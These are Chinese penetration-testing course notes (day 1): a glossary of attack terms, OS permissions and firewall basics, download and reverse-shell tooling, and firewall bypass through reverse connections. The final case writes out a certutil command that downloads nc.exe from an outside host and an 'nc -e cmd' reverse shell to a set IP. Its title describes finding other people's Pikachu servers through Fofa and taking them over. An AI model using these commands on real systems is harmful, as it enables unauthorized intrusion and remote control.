《渗透测试》操作系统&名词&文件下载&反弹SHELL&防火墙绕过 2022 day1

标签：SHELL 2022 用户 防火墙 day1 https 服务器 权限 com

  名词解释：  

POC：全称 ' Proof of Concept '，中文 ' 概念验证 ' ，常指一段漏洞证明的代码。

EXP：全称 ' Exploit '，中文 ' 利用 '，指利用系统漏洞进行攻击的动作。

Payload：中文 ' 有效载荷 '，指成功exploit之后，真正在目标系统执行的代码或指令。

Shellcode：简单翻译 ' shell代码 '，是Payload的一种，由于其建立正向/反向shell而得名。

POC是用来证明漏洞存在的，EXP是用来利用漏洞的，两者通常不是一类，或者说，PoC通常是无害的，Exp通常是有害的，有了POC，才有EXP。

Payload有很多种，它可以是Shellcode，也可以直接是一段系统命令。同一个Payload可以用于多个漏洞，但每个漏洞都有其自己的EXP，也就是说不存在通用的EXP。

 

后门/Webshell ：后门是对系统后门以及web端后门等一系列后门的统称。webshell专指web端的后门

木马/病毒：木马指的是控制计算机的程序。病毒指的是具有破坏性计算机的程序。

反弹，回显：反弹有反弹shell，将本机的shell窗口反弹到其他计算机中。回显指的是输入命令后的回显内容，sql注入中用到。

黑白盒测试：黑盒测试指只知道目标源代码信息进行渗透攻击，白盒是指知道目标源代码信息以及其他敏感信息进行攻击。

暴力破解，社会工程学：暴力破解常用于密码攻击，利用工具和字典对账号密码进行穷举攻击，社会工程学是指通过社交等手段收集到敏感信息的学问

撞库，ATT&CK：撞库，利用QQ暴露的账号和密码去攻击其用QQ注册登陆的各个网站或者app。ATT/CK是红蓝对抗使用的一个框架

 参考

https://www.cnblogs.com/sunny11/p/13583083.html

https://forum.ywhack.com/bountytips.php?download

https://forum.ywhack.com/reverse-shell/

https://blog.csdn.net/weixin_43303273/article/details/83029138

操作系统-用途&命令&权限&用户&防火墙

1、个人计算机&服务器用机

     服务器规格较高，内存容量高于pc。服务器旨在全天候运行。服务器中的组件通常可以承受更高的压力。

     服务器是一台电脑，可以支持多个应用程序同时运行，可以处理多个同时连接，而电脑不能。

     pc代表个人计算机，并已成为所有台式计算机的统称。pc不适合太复杂的应用程序。而服务器起着至关重要的作用，并具有丰富的配置和应用程序。与服务器相比，电脑的速度很慢。服务器可以无中断地运行并处理虚拟连接，并且可以控制多个客户端。

2、Windows&Linux常见命令 https://blog.csdn.net/weixin_43303273/article/details/83029138

3、文件权限&服务权限&用户权限等  文件权限：是否可打开文件 用户权限：普通用户的权限和管理员用户的权限

4、系统用户&用户组&服务用户等分类  

Administrator（管理员用户）拥有系统的所有权限

Guest （来宾用户）只有来宾用户可以使用，guest用户不可以删掉。

用户组是一群用户的统称

5、自带防火墙出站&入站规则策略协议

 防火墙的入站与出站规则，严进宽出。

 

#实用案例1：文件上传下载-解决无图形化&解决数据传输

棱角社区可查找命令 https://forum.ywhack.com/bountytips.php?download

Linux：wget curl python ruby perl java等

Windows：PowerShell Certutil Bitsadmin msiexec mshta rundll32等  

 

#实用案例2：反弹Shell命令-解决数据回显&解决数据通讯

https://forum.ywhack.com/shell.php

useradd 用户名 passwd 用户名

测试Linux系统添加用户或修改密码命令交互回显问题

 

#结合案例1：防火墙绕过-正向连接&反向连接&内网服务器

1、内网：

内网 -> xiaodi8

xiaodi8 !-> 内网

2、防火墙：

xiaodi8 <-> aliyun

xiaodi8防火墙 -> aliyun

aliyun !-> xiaodi8防火墙

 

#结合案例2：学会了有手就行-Fofa拿下同行Pikachu服务器

文件下载&反弹Shell:

certutil -urlcache -split -f http://www.xiaodi8.com/nc.exe nc.exe

nc -e cmd 47.75.212.155 5566

从靶场的rce模块入手，开始Ping命令

然后下载nc程序

再绑定cmd到自己端口 

 

 

 

 

 

 

 

 

 

 

 

标签：SHELL,2022,用户,防火墙,day1,https,服务器,权限,com
From： https://www.cnblogs.com/muqing1/p/17191162.html